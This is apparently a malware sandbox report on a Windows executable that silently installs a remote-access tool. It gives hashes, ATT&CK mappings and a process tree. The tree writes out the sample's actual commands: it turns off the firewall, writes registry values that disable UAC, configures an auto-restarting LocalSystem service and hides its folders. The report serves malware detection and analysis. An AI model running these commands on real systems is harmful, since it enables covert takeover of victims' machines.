72b8ae8a48ac728a53bc503473d1ef244e830fbb7e20e451fb85999177c91754

Analysis

max time kernel
149s
max time network
149s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
14-06-2024 01:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe
Size

3.8MB
MD5

a79ab104e6460c53f606ed19adba0f8d
SHA1

6d43166366e7c0ca0be382222fb28e4b8eccc116
SHA256

72b8ae8a48ac728a53bc503473d1ef244e830fbb7e20e451fb85999177c91754
SHA512

e66cc91122441285205a4fb01698b1e0e6ccf83a6e78a0a9d56128036711bee3e298bf8e0f73ed421bff3ff906db45cbc6f8c086089d32f77aba292c7c773e09
SSDEEP

98304:/Ft/3rN7Yu/5hx4EU7Ddl4LP9gYsFCJVVZE8EorPdq3BF:nbN7Yg5cEUfdGzRsFCJzGHxRF

Score

10^/10

evasion trojan upx

Malware Config

Signatures

Modifies firewall policy service 2 TTPs 8 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

regedit.exeregedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	regedit.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	regedit.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

regedit.exeregedit.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	regedit.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	regedit.exe

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

3008 netsh.exe
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

2376 attrib.exe
2184 attrib.exe
1644 attrib.exe

pid	process
3008	netsh.exe

pid	process
2376	attrib.exe
2184	attrib.exe
1644	attrib.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

Processes:

resource	yara_rule
C:\Log\vp8encoder.dll	acprotect

Executes dropped EXE 8 IoCs

Processes:

Rar.exelnlvbpt.exelnlvbpt.exelnlvbpt.exelnlvbpt.exeedylafnzjw.exeedylafnzjw.exeedylafnzjw.exe

pid process

2728 Rar.exe
2520 lnlvbpt.exe
868 lnlvbpt.exe
1496 lnlvbpt.exe
840 lnlvbpt.exe
2212 edylafnzjw.exe
1732 edylafnzjw.exe
2320 edylafnzjw.exe
Loads dropped DLL 6 IoCs

Processes:

cmd.execmd.exelnlvbpt.exe

pid process

2640 cmd.exe
3004 cmd.exe
3004 cmd.exe
3004 cmd.exe
840 lnlvbpt.exe
840 lnlvbpt.exe

pid	process
2728	Rar.exe
2520	lnlvbpt.exe
868	lnlvbpt.exe
1496	lnlvbpt.exe
840	lnlvbpt.exe
2212	edylafnzjw.exe
1732	edylafnzjw.exe
2320	edylafnzjw.exe

pid	process
2640	cmd.exe
3004	cmd.exe
3004	cmd.exe
3004	cmd.exe
840	lnlvbpt.exe
840	lnlvbpt.exe

UPX packed file 33 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Log\lnlvbpt.exe	upx
C:\Log\vp8encoder.dll	upx
C:\Log\edylafnzjw.exe	upx
behavioral1/memory/2520-79-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2520-81-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/868-85-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/868-86-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/1496-91-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-93-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2212-101-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/1496-104-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/1732-103-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/2320-110-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/2320-111-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/1732-113-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/2212-114-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/840-112-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-116-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2212-119-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/840-121-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2212-123-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/840-125-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2212-127-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/840-131-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-135-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/2212-137-0x0000000000400000-0x00000000009B6000-memory.dmp	upx
behavioral1/memory/840-138-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-142-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-145-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-149-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-152-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-156-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx
behavioral1/memory/840-159-0x0000000000400000-0x0000000000AB2000-memory.dmp	upx

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

1384 sc.exe
612 sc.exe
2492 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

2696 timeout.exe
2532 timeout.exe
1652 timeout.exe
536 timeout.exe
2976 timeout.exe

pid	process
1384	sc.exe
612	sc.exe
2492	sc.exe

pid	process
2696	timeout.exe
2532	timeout.exe
1652	timeout.exe
536	timeout.exe
2976	timeout.exe

Kills process with taskkill 10 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
304	taskkill.exe
1048	taskkill.exe
1704	taskkill.exe
1796	taskkill.exe
2472	taskkill.exe
1792	taskkill.exe
284	taskkill.exe
1040	taskkill.exe
1412	taskkill.exe
2880	taskkill.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

1984 regedit.exe
1660 regedit.exe
Runs net.exe

pid	process
1984	regedit.exe
1660	regedit.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

lnlvbpt.exelnlvbpt.exelnlvbpt.exelnlvbpt.exeedylafnzjw.exe

pid	process
2520	lnlvbpt.exe
2520	lnlvbpt.exe
2520	lnlvbpt.exe
2520	lnlvbpt.exe
868	lnlvbpt.exe
868	lnlvbpt.exe
1496	lnlvbpt.exe
1496	lnlvbpt.exe
840	lnlvbpt.exe
840	lnlvbpt.exe
840	lnlvbpt.exe
840	lnlvbpt.exe
1732	edylafnzjw.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

edylafnzjw.exe

pid process

2320 edylafnzjw.exe

pid	process
2320	edylafnzjw.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exelnlvbpt.exelnlvbpt.exelnlvbpt.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1792	taskkill.exe
Token: SeDebugPrivilege	2880	taskkill.exe
Token: SeDebugPrivilege	304	taskkill.exe
Token: SeDebugPrivilege	284	taskkill.exe
Token: SeDebugPrivilege	1048	taskkill.exe
Token: SeDebugPrivilege	1040	taskkill.exe
Token: SeDebugPrivilege	1704	taskkill.exe
Token: SeDebugPrivilege	1412	taskkill.exe
Token: SeDebugPrivilege	2520	lnlvbpt.exe
Token: SeDebugPrivilege	1496	lnlvbpt.exe
Token: SeTakeOwnershipPrivilege	840	lnlvbpt.exe
Token: SeTcbPrivilege	840	lnlvbpt.exe
Token: SeTcbPrivilege	840	lnlvbpt.exe
Token: SeDebugPrivilege	1796	taskkill.exe
Token: SeDebugPrivilege	2472	taskkill.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

lnlvbpt.exelnlvbpt.exelnlvbpt.exelnlvbpt.exe

pid process

2520 lnlvbpt.exe
868 lnlvbpt.exe
1496 lnlvbpt.exe
840 lnlvbpt.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exeWScript.execmd.exeWScript.execmd.exe

description	pid	process	target process
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 1148 wrote to memory of 2748	1148	a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe	WScript.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2748 wrote to memory of 2640	2748	WScript.exe	cmd.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2728	2640	cmd.exe	Rar.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2696	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2788	2640	cmd.exe	WScript.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2640 wrote to memory of 2532	2640	cmd.exe	timeout.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 2788 wrote to memory of 3004	2788	WScript.exe	cmd.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 3008	3004	cmd.exe	netsh.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 1792	3004	cmd.exe	taskkill.exe
PID 3004 wrote to memory of 2880	3004	cmd.exe	taskkill.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exeattrib.exeattrib.exe

pid process

1644 attrib.exe
2376 attrib.exe
2184 attrib.exe

pid	process
1644	attrib.exe
2376	attrib.exe
2184	attrib.exe

C:\Users\Admin\AppData\Local\Temp\a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a79ab104e6460c53f606ed19adba0f8d_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Log\run.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:2748

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Log\pause.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2640

C:\Log\Rar.exe
"Rar.exe" e -p74449175 db.rar
4⤵
- Executes dropped EXE
PID:2728

C:\Windows\SysWOW64\timeout.exe
timeout 5
4⤵
- Delays execution with timeout.exe
PID:2696

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Log\install.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Log\install.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set allprofiles state off
6⤵
- Modifies Windows Firewall
PID:3008

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rutserv.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rfusclient.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im systemc.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:304

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im drivemanag.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:284

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im dumprep.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1048

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im winlogs.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1040

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im lnlvbpt.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1704

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im edylafnzjw.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Windows\SysWOW64\net.exe
net stop RManService
6⤵
PID:344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RManService
7⤵
PID:1448

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
6⤵
PID:2512

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\HardwareConfig\DEVICEMAP" /f
6⤵
PID:2776

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\TektonIT\Remote Manipulator System" /f
6⤵
PID:2216

C:\Windows\SysWOW64\regedit.exe
regedit /s "regedit.reg"
6⤵
- Modifies firewall policy service
- UAC bypass
- Runs .reg file with regedit
PID:1984

C:\Windows\SysWOW64\timeout.exe
timeout 1
6⤵
- Delays execution with timeout.exe
PID:1652

C:\Folder58\lnlvbpt.exe
lnlvbpt.exe /silentinstall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2520

C:\Folder58\lnlvbpt.exe
lnlvbpt.exe /firewall
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:868

C:\Windows\SysWOW64\regedit.exe
regedit /s regedit.reg
6⤵
- Modifies firewall policy service
- UAC bypass
- Runs .reg file with regedit
PID:1660

C:\Folder58\lnlvbpt.exe
lnlvbpt.exe /start
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1496

C:\Windows\SysWOW64\sc.exe
sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
6⤵
- Launches sc.exe
PID:1384

C:\Windows\SysWOW64\sc.exe
sc config RManService obj= LocalSystem type= interact type= own
6⤵
- Launches sc.exe
PID:612

C:\Windows\SysWOW64\sc.exe
sc config RManService DisplayName= "RManService"
6⤵
- Launches sc.exe
PID:2492

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:2976

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Folder58\*.*"
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2376

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Folder58"
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2184

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\Log"
6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1644

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rar.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1796

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im rar.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2472

C:\Windows\SysWOW64\timeout.exe
timeout 2
4⤵
- Delays execution with timeout.exe
PID:2532

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Log\del.vbs"
4⤵
PID:2068

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Log\del.bat" "
5⤵
PID:2244

C:\Windows\SysWOW64\chcp.com
chcp 1251
6⤵
PID:3068

C:\Windows\SysWOW64\timeout.exe
timeout 15
6⤵
- Delays execution with timeout.exe
PID:536

C:\Folder58\lnlvbpt.exe
C:\Folder58\lnlvbpt.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:840

C:\Folder58\edylafnzjw.exe
C:\Folder58\edylafnzjw.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1732

C:\Folder58\edylafnzjw.exe
C:\Folder58\edylafnzjw.exe /tray
3⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:2320

C:\Folder58\edylafnzjw.exe
C:\Folder58\edylafnzjw.exe /tray
2⤵
- Executes dropped EXE
PID:2212

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Defense Evasion

Modify Registry

T1112

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Log\Rar.exe
Filesize
370KB

MD5
2e86a9862257a0cf723ceef3868a1a12

SHA1
a4324281823f0800132bf13f5ad3860e6b5532c6

SHA256
2356220cfa9159b463d762e2833f647a04fa58b4c627fcb4fb1773d199656ab8

SHA512
3a8e0389637fc8a3f8bab130326fe091ead8c0575a1a3861622466d4e3c37818c928bc74af4d14b5bb3080dfae46e41fee2c362a7093b5aa3b9df39110c8e9de

Download Submit
C:\Log\db.rar
Filesize
3.4MB

MD5
e67c1e16896a5bf46db982ef0a964a5e

SHA1
06e6a756a34f13651139843965811782bf9eb4f2

SHA256
2830b03f610fd029775a39c852d62c65135b9d159a3404210fce61c47899289d

SHA512
559db3f04edb5f4f73354260400bbbe2e7dfccf2449da3dc6cd6f778787116514eedb93f3d98eee156376e9283a838f1386c74d87a1a91eae1667065aa317d14

Download Submit
C:\Log\del.bat
Filesize
103B

MD5
00a1287d2fee5eb67a15b9db4e5410f6

SHA1
52fe326b86c112a23e5a7ab1d5017f01042e55a4

SHA256
138ff861033ef88c1ac1b7d3c69e207cb160aa7d0b9773df6496c1efdc29aaa3

SHA512
e3ef7a8d0b36aeaa0c41d720680d948f31a7873b656984e065d4af3138e12d66095e6db7d38913abdf2468ac8b7fc254c66f51dae000aeb8dc7e91d0734980c0

Download Submit
C:\Log\del.vbs
Filesize
80B

MD5
2130b30813709d5150e4b13d50f9779e

SHA1
94dd1a873f2c9ceb990fce6027f6a18a175465f5

SHA256
d2b02b775b3f29dfa0508e9243f1ca85a1c8c86bc30ca7f4651b2ddcc6c7bea3

SHA512
a04983c5fd57f21b5b0680132e51a8d28b0ceb3b42fab2de301b4ca8f236f892709159b0f4eda4801f9f712febb468d87ae3b59e573de990d4e6f2e055b4d68e

Download Submit
C:\Log\edylafnzjw.exe
Filesize
1.3MB

MD5
a2b60a6296d0b1ef68e1a278ff325c48

SHA1
28c29abdac82d4d2f32d79d46290af6913df6b62

SHA256
193ccbcbcbcdf92525532daee0f99c029e67f5210ba85a858c64d8b6f9b263b7

SHA512
c4c0ffabdc23aeed68d3d39525b8d23c327694b9e994f408e10cf4f4a6dfc446e1a9abbfea90386f47d1c21d6760b93c87fed17ed78dd70b7e03b372b067dad3

Download Submit
C:\Log\install.bat
Filesize
1KB

MD5
1657ec254bd530d720feb95f733208f2

SHA1
06063279be64fa2c326776d655a013e74c3fdc2a

SHA256
9bbd15b2fe0f66e68ee7fc98056ee9a6e38a21b77e99e4a3980927c42e0b58f7

SHA512
161722a982846641648db7fcfffe62424948fcd8c9981c581d46502aeda2f12f48fbadde3f7f5cfa49b66a1136a6f083ac65c9cb333ed55aefdfccef654e0222

Download Submit
C:\Log\install.vbs
Filesize
91B

MD5
1f2c79274a03a035333b15ed68fee8e4

SHA1
2e87549734e5a9e48d4ef75fa9fb06e9cfda2a5b

SHA256
50ec14a13ee65068dc43b7d884fc4d6fa7baa0e5a6095a469ce658dd8d78452f

SHA512
8ddec880f4af6ac1a066c5fa4fc0f57a9c97f038a8098a8a073bfe06bd2353b0ba7dc106ab6eaba5f36e057acb54b023b2a56cfc37df5b04bf5263f12f92b750

Download Submit
C:\Log\lnlvbpt.exe
Filesize
1.5MB

MD5
e8bbb2b910f98b95d4636d4e6adb83a5

SHA1
42a2236e59349256ad69ff85203147da244a77fb

SHA256
89e2089c247364f0ee4f66effb08ed25f94d2cb4825185269cd089bb2298a4cf

SHA512
876c7250e132c5383ea793edb691067d2745d4b1db2d72215e8177d6176f4fec8376d3735893a02e0ff6bb25cb79ba2fd82f00264efc6ba44b23f7b4efcf37cd

Download Submit
C:\Log\pause.bat
Filesize
304B

MD5
58dcf7bf33288f8e6ecc0a6c6145e9df

SHA1
0adc27888d7781281082f701085bee10cdeb7d31

SHA256
a80a58f075bd1868e481766e159584d4d8033c06558e39bbd93b089ce3661b86

SHA512
70ff386708564aad7b54f503e510d737d110c6ec6e7ef64599238efafa02073ed436851cf23c642952d3a8b311ca47332c8409fb8face5aea2f9f3f9c4334c9b

Download Submit
C:\Log\regedit.reg
Filesize
12KB

MD5
c3d8b8e22bfd840ad896ec9783198193

SHA1
f7cb4382f3581aae90e3ac731d76ef8423a4719d

SHA256
53aa65cb59b600d73373532923132eea30e773179eb85637fc874634d28c1657

SHA512
17bdba91ff68b5630ee8f6fd64dbf700ffbdae9d2be028ab02cfb7e768f2a3de0c0deecd26c8d3ee6414f5394f88e53d3a82234dbacbafff072e660f36310806

Download Submit
C:\Log\run.vbs
Filesize
84B

MD5
6a5f5a48072a1adae96d2bd88848dcff

SHA1
b381fa864db6c521cbf1133a68acf1db4baa7005

SHA256
c7758bb2fdf207306a5b83c9916bfffcc5e85efe14c8f00d18e2b6639b9780fe

SHA512
d11101b11a95d39a2b23411955e869f92451e1613b150c15d953cccf0f741fb6c3cf082124af8b67d4eb40feb112e1167a1e25bdeab9e433af3ccc5384ccb90c

Download Submit
C:\Log\vp8encoder.dll
Filesize
593KB

MD5
6298c0af3d1d563834a218a9cc9f54bd

SHA1
0185cd591e454ed072e5a5077b25c612f6849dc9

SHA256
81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

SHA512
389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

Download Submit
memory/840-145-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-131-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-156-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-149-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-159-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-142-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB

Download
memory/840-116-0x0000000000400000-0x0000000000AB2000-memory.dmp

Filesize
6.7MB
